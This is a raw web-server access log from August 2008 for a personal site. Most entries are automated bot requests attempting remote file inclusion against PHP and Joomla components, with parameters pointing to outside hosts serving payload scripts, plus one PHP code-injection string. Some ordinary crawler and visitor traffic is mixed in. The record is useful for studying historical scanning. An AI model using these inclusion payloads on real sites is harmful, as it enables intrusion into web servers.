89.208.43.121 - - [21/Aug/2008:11:05:37 -0700] "GET /admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:37 -0700] "GET /logs/access_080720.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [21/Aug/2008:11:05:37 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.caneus.org/d?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:05:38 -0700] "GET /logs/access_080723.log/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:05:53 -0700] "GET /logs/access_080725.log/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:06:06 -0700] "GET /logs/access_080124.log%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [21/Aug/2008:11:06:20 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [21/Aug/2008:11:06:21 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [21/Aug/2008:11:06:21 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:11:06:31 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:11:06:31 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:11:06:32 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:11:06:32 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.icpqa.com/images/hantu.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.166.106 - - [21/Aug/2008:11:06:41 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.taranakivista.co.nz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:06:53 -0700] "GET /logs/access_070711.log HTTP/1.0" 200 43580 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:07:09 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:07:48 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:07:48 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:07:48 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:11:08:01 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:08:03 -0700] "GET /logs/access_071129.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:08:03 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:11:08:03 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:11:08:05 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.215.148 - - [21/Aug/2008:11:08:24 -0700] "GET /logs/access_080124.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:08:43 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:08:53 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:11:09:15 -0700] "HEAD /retreat1/webcam/retreat1_00632.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:11:09:15 -0700] "GET /retreat1/webcam/retreat1_00632.jpg HTTP/1.1" 200 36527 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:09:30 -0700] "GET /logs/access_080503.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.138.76 - - [21/Aug/2008:11:09:31 -0700] "GET /logs/access_080710.log//admin/frontpage_right.php?loadadminpage=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [21/Aug/2008:11:09:31 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.129.138.76 - - [21/Aug/2008:11:09:32 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://gabifir.yourfreehosting.net/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:09:33 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:09:37 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:10:01 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:10:10 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:10:10 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:10:20 -0700] "GET /logs/access_080516.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.65.239.170 - - [21/Aug/2008:11:10:22 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 393216 "-" "-" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:10:29 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:10:29 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:10:30 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:10:35 -0700] "GET /logs/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:10:35 -0700] "GET /logs/access_080731.log/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.239.170 - - [21/Aug/2008:11:10:35 -0700] "GET /logs/access_080207.log HTTP/1.1" 200 393216 "-" "-" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:11:10:38 -0700] "GET /errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:10:39 -0700] "GET /index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9906 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:10:49 -0700] "GET /bikes/cb750K6/?N=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:11:30 -0700] "GET /logs/access_080710.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:11:30 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:11:56 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:11:56 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:11:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:12:07 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:12:26 -0700] "GET /bikes/dteel/2008_02_08/?N=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
128.163.2.43 - - [21/Aug/2008:11:12:28 -0700] "GET /logs/access_080118.log/index.php?url=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.163.2.43 - - [21/Aug/2008:11:12:29 -0700] "GET /index.php?url=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 200 9886 "-" "libwww-perl/5.805" "www.dmulk.com"
128.163.2.43 - - [21/Aug/2008:11:12:29 -0700] "GET /logs/index.php?url=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:12:31 -0700] "GET /logs/access_080731.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:12:37 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:12:37 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:12:48 -0700] "GET /logs/access_080516.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.94.237.141 - - [21/Aug/2008:11:12:50 -0700] "HEAD /logs/access_080717.log HTTP/1.0" 200 0 "http://tw.info.search.yahoo.com/language/translatedPage.php?tt=url&text=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080717.log&lp=en_zt&.intl=tw&fr=yfp-web" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0), Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
66.94.237.142 - - [21/Aug/2008:11:12:51 -0700] "GET /logs/access_080717.log HTTP/1.0" 200 2202147 "http://tw.info.search.yahoo.com/language/translatedPage.php?tt=url&text=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080717.log&lp=en_zt&.intl=tw&fr=yfp-web" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0), Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
80.93.62.114 - - [21/Aug/2008:11:13:06 -0700] "GET /logs/access_080211.log//error.php?page=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [21/Aug/2008:11:13:07 -0700] "GET //error.php?page=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [21/Aug/2008:11:13:07 -0700] "GET /logs//error.php?page=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.187.25.20 - - [21/Aug/2008:11:13:16 -0700] "GET /logs/access_080710.log//admin/frontpage_right.php?loadadminpage=http://www.computercreationscorp.com/dmdocuments/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [21/Aug/2008:11:13:17 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.computercreationscorp.com/dmdocuments/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [21/Aug/2008:11:13:17 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.computercreationscorp.com/dmdocuments/z6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:13:18 -0700] "GET /bikes/dteel/2008_02_08/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:11:13:21 -0700] "GET /logs/access_080605.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:11:13:31 -0700] "GET /logs/access_080615.log////?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:13:33 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.202.13.92 - - [21/Aug/2008:11:13:33 -0700] "GET /logs/access_080728.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:13:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:11:13:36 -0700] "GET /logs/access_080708.log%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:13:39 -0700] "GET /logs/access_080211.log//error.php?page=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:13:39 -0700] "GET //error.php?page=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:13:40 -0700] "GET /logs//error.php?page=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:13:40 -0700] "GET /logs/access_080211.log//error.php?page=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:13:40 -0700] "GET //error.php?page=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:41 -0700] "GET /?show=gallery&pageid=17 HTTP/1.1" 200 9837 "http://ixquick.com/do/metasearch.pl?query=WeSTOC+Redmond+WA&cat=web&pl=ff&language=english" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:13:41 -0700] "GET /logs//error.php?page=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:41 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:41 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:42 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:42 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:42 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:42 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:43 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:43 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:43 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:43 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:43 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:43 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:46 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&635 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
24.16.45.249 - - [21/Aug/2008:11:13:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-016.jpg HTTP/1.1" 200 472300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
200.150.189.10 - - [21/Aug/2008:11:13:56 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [21/Aug/2008:11:13:56 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [21/Aug/2008:11:13:56 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [21/Aug/2008:11:13:56 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.189.215.148 - - [21/Aug/2008:11:13:58 -0700] "GET /logs/access_080321.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [21/Aug/2008:11:14:19 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:11:14:22 -0700] "GET /logs/access_080531.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.179.155 - - [21/Aug/2008:11:14:40 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
